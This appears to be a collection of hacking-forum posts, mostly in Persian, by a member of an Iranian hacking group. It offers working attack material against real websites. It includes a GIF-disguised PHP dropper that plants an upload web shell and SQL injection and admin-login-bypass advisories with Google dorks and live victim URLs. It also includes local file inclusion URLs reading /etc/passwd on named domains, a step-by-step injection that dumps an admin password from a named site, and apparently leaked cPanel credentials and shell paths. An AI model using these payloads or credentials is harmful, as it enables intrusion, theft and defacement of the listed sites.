Pi.Hack

در ادامه صحبت 0xD0ctor عزیز میتونید از قطعه کد زیر برای اپلود فایل در هر دایرکتوری استفاده کنید GIF89a1 <?php $fp = fopen("../../pi.php","w"); $code='<?php if (isset($_FILES["userfile"])) { $dir=$_POST["dir"]; if($dir == "" || !isset($dir)) $dir=getcwd(); $uploadfile=$dir."/".basename($_FILES["userfile"]["name"]); if (move_uploaded_file($_FILES["userfile"]["tmp_name"],$uploadfile)) { echo "Uploaded: ". "Name: ".$_FILES["userfile"]["name"]."<br>\n". "Type: ".$_FILES["userfile"]["type"]."<br>\n". "Size: ".$_FILES["userfile"]["size"]." bytes<br>\n"; } else print "Error uploading file: ".$_FILES["userfile"]["name"].""; echo "<hr>"; } ?> <form enctype="multipart/form-data" method="POST"> Upload New File <input type="file" name="userfile"/> <input type="submit" value="Upload"/> <br><br> </form>'; if($fp){ fwrite($fp,$code); } fclose($fp); remotup.rar

سلام لطفا مطالبتون رو در تایپیک مربوطه بزارین و تایپیک جدید باز نکنین بخش مربوط به تارگت های تمرینی : https://iran-cyber.net/forums/topic/6-target-trainings/page/61

https://cxsecurity.com/issue/WLB-2020070149 # Title: indowebhub Cms Sql Injection # Author: Iran Cyber Security Group # date: 2020-07-28 # Vendor Homepage: https://indowebhub.com # Tested on: Windows # Category : Web Application Bugs # Discovered by : Pi.hack # Dork : "Powered By www.indowebhub.com" & "Created by Indowebhub" ------------------------------------------------------------------------------ # Proof : Search Dorks And Select A Target # Demo : http://www.manalitourismonline.com/honeymoon_package_detail.php?honeymoon_id=3' http://www.tipsedu.in/nursing.php?categories_id=3' # Admin Page : site.com/admin or Site.com/cms ------------------------------------------------------------------------------ # Offecial Website: https://iran-cyber.net

سلام دوستان اولا که قبل شروع یک تایپیک سرچ کنید که جوابتونو بگیرین یک تایپیک دیگ در همین موضوع بود که همین سوال شمارو مطرح کردن و دوستان تا جایی کمک کردن https://iran-cyber.net/forums/threads/%D9%87%D9%80%D9%80%DA%A9-%DA%86%D8%AA%D8%B1%D9%88%D9%85.3870/ طبق چیزی که بنده اطلاع دارم خیلی وقته چت روم ها امنیت رو بالا بردن به نظرم باگ پابلیک خطرناکی وجود نداره بهترین کار دانلود اسکریپت چت روم هست و این که خودتون با علم برنامه نویسی که دارین دنبال آسیب بگردین

سلام دوست عزیز اگر منظورتون افزونه مشابه هست Tamper Data , Burp Suite

سلام دوست عزیز چند دلیل میتونه داشته باشه اولا که بعضی وقتا ادمین سایت میاد یک تیبل تقلبی میسازه که نفوذ گر رو گمراه کنه و ممکنه یوز پس داخل یک ستون دیگری باشه که حتی اسم ستون هم نشون دهنده وجود یوزر و پسورد نباشه دوما که بعضی سایت ها ممکنه دچاره مشکل شده باشن و سایت به دیتابیس وصل نباشه قسمت ادمین پیج و باز هم لاگین نکنه دنبال یوزر و پسورد داخل سایر ستون ها بگردید یا اطمینان حاصل کنید که اطلاعات به دست اوردتونو درست وارد میکنین حتی ممکنه یک لاگین پیج فیک هم وجود داشته باشه و شما اون رو پیدا کرده باشین با اطمینان نمیشه گفت اگر ممکنه تارگت رو بزارین که دقیق تر برسی بشه

دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد

دوست عزیز لطفا مطالب رو خودتون زحمت بکشین و کپی نکنید و در صورت کپی منبع را ذکر کنید دفه بعد اخطار دریافت خواهید کرد

دوست عزیز میتونین از این آموزش استفاده کنین No back connect - root.zip

LFD http://www.verdanttelemetry.com/download_file.php?fname=../lib/conmanager.php

https://cxsecurity.com/issue/WLB-2017100100 ########################### # Exploit Title: TravelHungama Cms Admin Login Bypass # Google Dork: Powered By: TravelHungama # Date: 2017/10/12 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.travelhungama.com/ # Version: All Version # Tested on: Win # CVE : N/A ########################### # Exploit : # Search Google Dork And Select A Target # Admin Page : site.com/admin # Username & Password : '=' 'or' # Enjoy ########################### #Discovered by : Iran Cyber Security Group ###########################

http://www.house2homeuk.com/admin/login.php http://www.accordeng.com/admin/ http://www.event1inc.net/caffeine/ https://www.otakunews.com/admin/ http://www.ardmoreconventioncenter.com/caffeine User & Pass '=' 'or'

http://www.mandomintertrade.com/upload/productsubtype/home.php http://www.siammatee.net/image/news/webadmin.php http://com57business.com/data/b374.php

Sql Injection Target : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=10 Tedad Soton : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=10 order by 8-- Soton Asib Pazir : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=10%20UNION%20SELECT%201,2,3,4,5,6,7,8-- ارور میده بایپیس میکنیم : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,2,3,4,5,6,7,8-- Version : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,version%28%29,3,4,5,6,7,8-- Tables : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,group_concat%28table_name%29,3,4,5,6,7,8%20from%20information_schema.tables-- ارور داد . به group_concat گیر میده بایپیس میکنیم : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,/*!50000groUp_coNcat%28table_name%29*/,3,4,5,6,7,8%20from%20information_schema.tables-- محدود میکنیم : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,/*!50000groUp_coNcat%28table_name%29*/,3,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29-- Table Admin ====>>>> eve_tblofficer کالمن ها : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10%20/*!50000UNION*/%20SELECT%201,/*!50000groUp_coNcat%28column_name%29*/,3,4,5,6,7,8%20from%20information_schema.columns%20where%20table_name=0x6576655f74626c6f666669636572 بییرون کشیدن یوزر و پسورد : http://www.evelyncannon.com/galleryview.php?gallerycategoriesid=.10 /*!50000UNION*/ SELECT 1,/*!50000groUp_coNcat(Login,0x7e,Password)*/,3,4,5,6,7,8 from eve_tblofficer User : admin Password : admin1234 Admin Page : http://www.evelyncannon.com/admin/login.php ~By

https://cxsecurity.com/issue/WLB-2015110222 # Exploit Title : WEBONE CMS SQL Injection Vulnerability # Date : 27/11/2015 # Exploit Author : Iran Cyber Security Group # Discovered By : Pi.hack # Category : Web Application Bugs # Dork : intext:Power by:WEBONE # Tested On : Windows , Kali Linux # Home : Iran-Cyber.net # Proof Of Concept : First Find Targets By Searching The Dork In Search Engines Like Google,Bing,... Then You Can Run Your Sql Injection Attack # Admin Page : site.com/webadmin # Demo : # http://ander-express.com/news_con.php?lang=zh&pk=5' # http://jolinn-pethouse.com.tw/news_con.php?lang=zh&pk=14' ------------------------------ Website : Iran-Cyber.Net # Thanks To : root3r | MOHAMAD-NOFOZI | JOK3R | Pi.Hack | CRY$I$ BL4CK | WH!T3 W01F | 0day | Saiber89 And All Members Of Iran-Cyber.Net

http://192.185.156.181:2082 Procoderz~ user is (mutaz) Password is (admin123) Procoderz~ user is (alacacia) Password is (admin123) Procoderz~ user is (ns) Password is (admin123) چند تا سی پنل

LFI http://www.cncseries.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://goldenguitar.net/n/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.ecogene.org/old/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.al-belad.net/d/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.almousa-sa.com/d/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://alsafir-sy.net/sasy/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://pen-sy.com/d/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://cddk.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://jcvd.name/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.noonptm.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.mlahi.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.nlp4arab.com/n/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd http://www.moubadarah.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd

http://www.exploit4arab.net/exploits/1691 ############################################################## # Exploit Title: YSD CMS Admin Bypass Vulnerability # # Google Dork: intext:Web Design by YSD # # Date: 26-7-2015 # # Exploit Author: Iran Cyber Security Group # # Discovered By: Pi.hack # # Vendor Homepage: http://www.ysd.hk/ # # Version: All version # # Tested on: Windows ############################################################## [~] VULNERABILITY}~~ ############## http://www.Site.com/admin/ [~] EXPLOIT: ############## Username: '=' 'or' Password: '=' 'or' [~] LIVE DEMO: ############## # demo 1 : http://www.nikoworld.com.hk/admin/ # # demo 2 : http://www.jacegroup.com/admin/ ###################################################################### # Contact mail: [email protected] # Skype: uid.root # Offecial Website: http://iran-cyber.org # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | And All Members Of Iran-Cyber.Org #############################################################################

https://cxsecurity.com/issue/WLB-2015120096 http://www.exploit4arab.net/exploits/1687 ################################################### # # [+] Exploit Title: ThaiWebPlus CMS Sql Injection Vulnerability # [+] Google Dork: Powered by ThaiWebPlus # [+] Exploit Author: Iran Cyber Security Group # [+] Discovered By: Pi.Hack # [+] Vendor Homepage: http://thaiwebplus.com # [+] Version: All version # [+] Tested on: Windows & Linux # ################################################### # # [+] Exploit: # [+] http://localhost/index.php?Content=product&id_run=[iD]'[sql Injection] # ################################################### # # [+] Proof: # [+] http://localhost/index.php?Content=product&id_run=[iD]' [Not loaded] # ################################################### # # [+] Demo: # [+] http://www.yingphaiboon-aquarium.com/index.php?Content=product&id_run=-30+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://88part.com/index.php?Content=product&id_run=-3+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://ampcooling.com/index.php?Content=service&id_run=-1+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user-- # ################################################### # # Admin Page: # site.com/_admin/ # ################################################### # Contact mail: [email protected] # Skype: uid.root # Home Page : www.Iran-Cyber.Org # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org ###################################################

http://www.exploit4arab.net/exploits/1682 http://vulnerability-lab.com/get_content.php?id=1555 در سایت های دیگ هم ثبت شد که به زودی لینک رو براتون میزارم ################################################### # # [+] Exploit Title: ThaiWeb CMS Sql Injection Vulnerability # [+] Google Dork: Powered by ThaiWeb # [+] Exploit Author: Iran Cyber Security Group # [+] Discovered By: Pi.Hack # [+] Vendor Homepage: http://www.thaiweb.net/ # [+] Version: All version # [+] Tested on: Windows & Linux # ################################################### # # [+] Exploit: # [+] http://localhost/index.php?Content=product&id_run=[iD]'[sql Injection] # ################################################### # # [+] Proof: # [+] http://localhost/index.php?Content=product&id_run=[iD]' [Not loaded] # ################################################### # # [+] Demo: # [+] http://www.thairctoy.com/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://www.coloursparkbangkok.com/index.php?Content=product&id_run=-5+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # [+] http://www.yingphaiboon-aquarium.com/index.php?Content=product&id_run=-5+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user-- # ################################################### # # Admin Page: # site.com/_adminP/ # ################################################### # Contact mail: [email protected] # Skype: uid.root # Home Page : www.Iran-Cyber.Org # Thanks To : root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org ###################################################

http://www.exploit4arab.net/exploits/1661 ############################################################## # Exploit Title: ออกแบบเว็บไซต์ โดย orange CMS Admin Bypass Vulnerability # # Google Dork: intext:ออกแบบเว็บไซต์ โดย orange # # Date: 14-7-2015 # # Exploit Author: Iran Cyber Security Group # # Discovered By: Pi.hack # # Vendor Homepage: http://orange-thailand.com/ # # Version: All version # # Tested on: Windows ############################################################## [~] VULNERABILITY}~~ ############## http://www.Site.com/admin/ [~] EXPLOIT: ############## Username: '=' 'or' Password: '=' 'or' [~] LIVE DEMO: ############## # demo 1 : http://www.sornkaew-resort.com/admin/ # # demo 2 : http://www.baolithailand.com/admin/ # # demo 3 : http://www.88imagestudio.com/admin/ ###################################################################### # Contact mail: [email protected] & [email protected] # Skype: uid.root # Offecial Website: http://iran-cyber.org # Thanks To : | root3r | MOHAMAD-NOFOZI | KamraN HellisH | JOK3R | WH!T3_W01F | CRY$I$ BL4CK | And All Members Of Iran-Cyber.Org #############################################################################